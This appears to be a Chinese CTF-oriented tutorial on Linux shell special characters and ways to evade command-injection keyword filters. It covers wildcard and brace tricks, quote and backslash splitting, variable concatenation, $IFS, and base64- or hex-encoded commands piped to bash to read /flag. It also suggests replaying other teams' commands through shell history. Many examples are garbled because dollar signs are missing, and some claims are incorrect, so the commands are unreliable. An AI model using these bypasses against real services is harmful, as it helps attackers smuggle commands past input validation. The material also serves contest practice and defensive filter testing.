在linux系统中,命令执行和绕过技术涉及许多特殊字符和技巧。这些字符和技巧可以帮助用户更有效地操作系统,同时在某些情况下绕过安全限制。本文将详细介绍这些特殊字符及其用法。
特殊字符在Linux命令行中的作用如下:
-
$:表示输入的第n个参数。例如,$1表示第一个参数,$2表示第二个参数。对于10及以上的参数,需要使用${10}的形式。 -
cd 0 ~9:表示切换到当前用户的根目录。 -
$:也表示全局变量。 -
!:可以单独成一个文件夹,也可以作为文件夹的末位字符,但不能在叹号后面加东西。叹号加字符代表特殊含义。
在命令执行中,以下是常用的特殊字符和技巧:
!! --> 执行上一条命令 !$ --> 上一个命令的最后一个参数 !^ --> 上一个命令的第一个参数 !:- --> 去掉最后一个参数执行上一个命令 !* --> 使用上条命令的所有参数 命令 !上一条命令:参数所在位置 --> 使用上一条参数的指定参数加入到现在这条命令中 !历史命令数值 --> 执行 history 中指定对应条数的命令 !-2 --> 执行 history 中倒数第二条命令 !关键字 --> 执行上一条包含命令关键字的命令 !!:gs/old/new --> 将上条命令中的 old 替换为 new 逻辑非 ls !(*.cfg)
例如,如果前面执行过cat /flag,那么执行!cat将会执行匹配到的cat /flag命令。然而,如果先执行cat /flag再执行cat /etc/passwd,那么执行!cat只会输出passwd的内容,而不会输出/flag。
在比赛中,如果无法绕过flag关键字的过滤,但在同一环境下,可以通过不断执行!cat来查看其他队伍的cat命令内容。如果有其他人通过cat输出flag,我们也可以得到flag。
.表示当前的shell,例如/bash/shell。
-
;:用分号隔开每个命令,按从左到右的顺序执行,彼此之间不关心是否失败,所有命令都会执行。
用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
-
|:管道符,表示上一条命令的输出作为下一条命令的参数。
| 表示管道,上一条命令的输出,作为下一条命令的参数
-
||:逻辑或(短路或),左边为真时,右边不执行;左边为假时,才会继续执行右边。
即逻辑或(短路或)||左边为真时,则右边不执行||左边为假时,才会继续执行右边[root@VM-16-13-centos ~]# echo 1 || echo 21
-
&:放在启动参数后面表示设置此进程为后台进程。在CTF中,它表示先执行右边再执行左边。
& 放在启动参数后面表示设置此进程为后台进程语法:command1 &此外在CTF中,它又表示先执行右边再执行左边语法:command1 & command2 ping 127.0.0.1 & ls(先执行ls后执行ping)
-
&&:逻辑与,先执行左边,只有左边为真,才会执行右边。
逻辑与,和||恰恰相反。先执行左边,只有左边为真,才会执行右边语法:command1 && command2 [&& command3 ...]
-
{}与():用于将一串命令放在括号内,命令之间用分号隔开。
1、(command1;command2;command3....)
2、{ command1;command2;command3…} #第一条命令必须与左边的括号有一个空格,最后一条命令一定要有分号
3、{command,argument}
相同点:
()和{}都是把一串的命令放在括号里面,并且命令之间用;号隔开
不同点
()只是对一串命令重新开一个子shell进行执行,{}对一串命令在当前shell执行
()最后一个命令可以不用分号,{}最后一个命令要用分号
()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格
()和{}中括号里面的某个命令的重定向只影响该命令,但括号外的重定向则影响到括号里的所有命令root@A1u[14:42:02]:~pwd;cat /flag/rootflag{th1s_1s_fl0g}root@A1u[14:45:18]:~ cat /flag;pwdflag{th1s_1s_fl0g}/rootroot@A1u[14:45:23]:~{cat,/flag}flag{th1s_1s_fl0g}root@A1u[14:45:28]:~ { cat /flag;pwd;}flag{th1s_1s_fl0g}/rootroot@A1u[14:45:33]:~{cat /flag;pwd;}-bash: syntax error near unexpected token `}'root@A1u[14:45:38]:~ { cat /flag;pwd}> ^Croot@A1u[14:45:48]:~{ cat /flag,pwd;}cat: /flag,pwd: No such file or directoryroot@A1u[14:47:23]:~ { pwd,cat /flag;}-bash: pwd,cat: command not found
输入/输出的重定向:
command > file 将输出重定向到 file command > file 将输出以追加的方式重定向到 file n > file 将文件描述符为 n 的文件重定向到 file。 n >> file 将文件描述符为 n 的文件以追加的方式重定向到 file。 n >& m 将输出文件 m 和 n 合并。 n
一些特殊的Trick(绕过命令字符的检测):
- 通配符
*与?:
cat /f* 输出所有f开头的文件 cat /f??? 输出所有f开头且文件名为四个字符的文件
-
[]与的绕过:
cat /f[a-z]ag 输出/flag /flbg ... /flzg
cat /f{l,a,b}ag 输出/flag /faag /fbag关键字绕过:
- 命令提示符:使用
*、@、x(x代表1-9,0表示Shell本身的文件名故不可用)、{x}(x>=10)。在没有传参的情况下,这些值都是空。但如果执行cd 0 … cd 9就是转到~目录。
ca*t 1.txt //* 是传给脚本的所有参数的列表
ca@t 1.txt //@ 是传给脚本的所有参数的列表
ca9t 1.txt //9 是传递给该shell脚本的第九个参数
ca{11}t 1.txt //{x} 两位数以上用${}括起来反斜杠:
ca\t /flag cat /flag ca\t /f\lag cat /flag
连接符——单引号||双引号:
双引号:""t /flag cat "/fl""ag" ca""t "/fl""ag" 单引号: ca''t /flag cat '/fl''ag' ca''t '/fl''ag'
变量拼接:
1. a=ca;b=t;ab 1.txt
2. a=/flag&& cat a
3. a='/flag' && cat a
4. a=g;cat /fla
3. a="lxs/";b={a:0:1}{a:2:1}{IFS}{a:3:1};$b 利用截取凑成: ls /编码绕过:
- base64编码绕过:
echo 'Y2F0Cg==' | base64 -d 1.txt - base64编码绕过:
echo 'Y2F0IDEudHh0' | base64 -d |bash(或sh) - base64+sh、bash执行:
echo '636174202f666c6167'|xxd -r -p|bash
其中:xxd -r -p 将某种列格式的纯十六进制转储读入,也可以加上 0x 的前缀。
特殊的字符替代方式:
echo {PS2} 对应字符 >
echo{PS4} 对应字符 +
echo {IFS} 对应 内部字段分隔符
echo{9} 对应 空字符串此外还有8进制 + {}写shell,8进制 + ()执行,16进制 + {}写shell等方法。
